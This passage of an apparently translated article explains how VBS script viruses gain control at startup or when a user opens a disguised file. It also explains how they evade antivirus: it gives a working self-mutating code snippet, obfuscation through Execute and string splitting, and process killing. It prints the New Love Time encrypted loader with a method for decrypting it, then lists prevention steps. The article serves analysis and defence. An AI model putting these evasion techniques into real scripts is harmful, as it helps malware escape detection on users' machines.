3. How VBS Script Viruses Obtain Control
How to obtain control? This is a relatively interesting topic, and VBS script viruses seem to have brought this topic to the extreme. The author lists several typical methods here:
1) Modify the registry key
When Windows starts, it will automatically load the programs pointed to by the key values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The script virus can add a key value here to point to the virus program, so as to ensure that it gets control every time the machine starts. The method for vbs to modify the registry is relatively simple, and you can directly call the following statement.
wsh.RegWrite(strName, anyvalue )
2) Through the mapping file execution method
For example, the New Love Time virus modifies the execution method of dll to wscript.exe. It can even point the mapping of the exe file to the virus code.
3) Deceive the user to let the user execute it themselves
This method is actually related to the user's psychology. For example, when the virus sends an attachment, it uses a file name with a double suffix. Since the suffix is not displayed by default, for example, a vbs program named beauty.jpg.vbs is displayed as beauty.jpg. At this time, the user will often click it as a picture. Similarly, for the user's own files on the disk, when the virus infects them, it generates a virus file with the original file name as the prefix and.vbs as the suffix, and deletes the original file. In this way, the user may run this vbs file as their original file.
4) Desktop.ini and folder.htt cooperate with each other
These two files can be used to configure the active desktop and can also be used to customize the folder. If the user's directory contains these two files, when the user enters the directory, the virus code in folder.htt will be triggered. This is a relatively effective method for the New Love Time virus to obtain control. And using folder.htt, it may also trigger the exe file, which may also become an effective method for the virus to get control!
There are many other methods for the virus to obtain control, and the author has a lot of room for play in this regard.
4. Several Skills of Vbs Script Viruses to Resist Anti-virus Software
For the virus to survive, the ability to resist anti-virus software is also necessary. Generally speaking, VBS script viruses use the following methods to resist anti-virus software:
1) Self-encryption
For example, the New Love Time virus can randomly select a key to encrypt and transform part of its own code, so that the virus code infected each time is different, achieving a polymorphic effect. This brings some difficulties to the traditional signature-based virus detection method. The virus can further use the metamorphosis technology, so that the decrypted code of the encrypted virus after each infection is different.
The following is a simple vbs script metamorphosis engine (from flyshadow)
Randomize
Set Of = CreateObject("Scripting.FileSystemObject") 'Create a file system object
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall 'Read its own code
fS = Array("Of", "vC", "fS", "fSC") 'Define an array of strings that will be replaced
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))) 'Replace the strings in array fS with 4 random characters
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC 'Write the replaced code back to the file
This code makes the four strings Of, vC, fS, and fSC in this VBS file be replaced with random strings every time it runs, which can largely prevent anti-virus software from detecting it using the signature-based virus detection method.
2) Skillfully using the Execute function
Friends who have used VBS programs may find it strange: when a normal program uses the FileSystemObject object, some anti-virus software will report that the risk of this Vbs file is high when scanning this program, but why do some VBS script viruses also use the FileSystemObject object but there is no warning? The reason is very simple, that is, these viruses skillfully use the Execute method. Some anti-virus software will check whether the program declares to use the FileSystemObject object when detecting VBS viruses. If it is used, it will issue an alarm. If the virus converts this declaration code into a string and then executes it through the Execute(String) function, it can avoid some anti-virus software.
3) Changing the declaration method of some objects
For example, fso = createobject("scripting.filesystemobject"), we change it to
fso = createobject("script" + "ing.filesyste" + "mobject"), so that the anti-virus software will not find the FileSystemObject object when it performs static scanning.
4) Directly closing the anti-virus software
VBS script has powerful functions. It can directly search for the user's processes and then compare the process names. If it finds that it is the process of the anti-virus software, it will directly close it and delete some of its key programs.
5. Introduction to the Principle of Vbs Virus Generator
The so-called virus generator refers to software that can directly generate virus source code according to the user's selection. To many people, this may be inconceivable, but in fact, it is very simple to implement for script viruses.
The script language is interpreted and executed, does not need to be compiled, and there is no need for verification and positioning in the program. Each statement is separated relatively clearly. In this way, first make the virus functions into many separate modules. After the user makes the virus function selection, the generator only needs to piece together the corresponding function modules, and finally make corresponding code replacements and optimizations. Due to space limitations and other reasons, it will not be introduced in detail here.
#### III. How to Prevent Vbs Script Viruses
1. How to Extract (Encrypt) Script Viruses from Samples
For unencrypted script viruses, we can directly find them from the virus samples. Now, how to extract encrypted VBS script viruses from the virus samples is introduced. Here we take the New Love Time as an example.
Open folder.htt with JediEdit. We find that this file has only 93 lines. The first line is <BODY onload="vbscript:KJ_start()">, after a few lines of comments, it starts with <html> and ends with </html>. I believe everyone knows what type of file this is!
Lines 87 to 91 are the following statements:
87: <script language=vbscript>
88: ExeString = "Afi FkSeboa)EqiiQbtq)S^pQbtq)AadobaPfdj)>mlibL^gb`p)CPK...; the rest is omitted, it's very long!
89: Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 3"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 4"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next") 90: Execute(ThisText) 91: </script>
Lines 87 and 91 need no explanation. Line 88 is the assignment of a string, which is obviously encrypted virus code. Looking at the last part of line 89, ThisText = ThisText & TempChar, plus the next line, we can definitely guess that ThisText contains the virus decryption code (of course, brothers who are familiar with vbs can also analyze this decryption code, too simple! Even if you don't look at the code at all, you should be able to see it). Line 90 is to execute the code in ThisText just now (the code after decryption processing).
So, what should be done next? Very simple, we just need to output the content of ThisText to a text file after the virus code is decrypted. Since the above lines are vbscript, I created the following.txt file:
First, copy lines 88 and 89 to the just-created.txt file. Of course, if you are willing to see the execution effect of the New Love Time, you can also enter line 90 at the end. Then enter the vbs code for creating a file and writing ThisText to the file below. The entire file is as follows:
ExeString = "Afi... ' Line 88 code Execute("Dim KeyAr... ' Line 89 code
set fso = createobject("scripting.filesystemobject") ' Create a file system object
set virusfile = fso.createtextfile("resource.log",true) ' Create a new file resource.log to store the decrypted virus code virusfile.writeline(ThisText) ' Write the decrypted code to resource.log
OK! It's that simple. Save the file, change the file suffix name.txt to.vbs (.vbe is also okay), double-click, and you will find that there is an additional file resource.log in the directory of this file. Open this file, how about it? Is it the source code of "New Love Time"?
2. Weaknesses of Vbs Script Viruses
Because the programming language of vbs script viruses is a script, it will not be as convenient and flexible as PE files. Its operation requires conditions (but this condition is usually met by default). The author believes that VBS script viruses have the following weaknesses:
1) Most VBS script viruses need to use an object: FileSystemObject when running
2) VBScript code is interpreted and executed through Windows Script Host.
3) The operation of VBS script viruses requires the support of its associated program Wscript.exe.
4) Viruses spread through the web need the support of ActiveX
5) Viruses spread through Email need the support of the automatic email sending function of OE, but most viruses use Email as the main spread method.
3. How to Prevent and Remove Vbs Script Viruses
Aiming at the weaknesses of the VBS script viruses mentioned above, the author puts forward the following prevention measures:
1) Disable the file system object FileSystemObject
Method: Use the command regsvr32 scrrun.dll /u to disable the file system object. Among them, regsvr32 is an executable file in Windows\System. Or directly find the scrrun.dll file and delete or rename it.
There is also a method to find a key {0D43FE01-F093-11CF-8940-00A0C9054228} in the registry HKEY_CLASSES_ROOT\CLSID\ and delete it.
2) Uninstall Windows Scripting Host
In Windows 98 (the same applies to NT 4.0 and above), open → → → , and cancel the "Windows Scripting Host" item.
The same as the above method, find a key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} in the registry HKEY_CLASSES_ROOT\CLSID\ and delete it.
3) Delete the mapping between VBS, VBE, JS, JSE file suffixes and application programs
Click → → → , and then delete the mapping between VBS, VBE, JS, JSE file suffixes and application programs.
4) In the Windows directory, find WScript.exe, change its name or delete it. If you think you may need to use it later, it is better to change its name. Of course, you can reinstall it later.
5) To completely prevent VBS network worm viruses, you also need to set your browser. First, open the browser, click the button in the tab in the menu bar. Set all "ActiveX controls and plugins" to disabled. This way, you don't have to worry. Hehe, for example, if the ActiveX component of the New Love Time cannot run, this network spread function will be useless.
6) Disable the automatic sending and receiving email function of OE
7) Since worm viruses mostly make use of file extensions, to prevent them, do not hide the extensions of known file types in the system. Windows defaults to "Hide extensions for known file types", and change it to display the extensions of all file types.
8) Set the security level of the system's network connection to at least "Medium". It can prevent some harmful Java programs or some ActiveX components from invading the computer to a certain extent.
9) Hehe, the last item, everyone should know it without saying. Anti-virus software is indeed necessary. Although some anti-virus software makes many users disappointed, but the choice is mutual. In this network full of viruses, if your machine is not installed with anti-virus software, I think it's really incredible.
#### IV. Outlook on the Development of All Script-based Viruses
With the rapid development of the network, network worm viruses have become popular, and VBS script worms are even more prominent, not only in large numbers but also powerful. Since it is relatively easy to write viruses using scripts, in addition to continuing to popularize the current VBS script viruses, more other script-based viruses, such as PHP, JS, Perl viruses, will gradually appear.
But scripts are not the best tool for real virus technology enthusiasts to write viruses, and script viruses are relatively easy to remove and prevent. The author believes that script viruses will continue to be popular, but script worm viruses that can have a great impact like the Love Bug and New Love Time are just a minority.
|
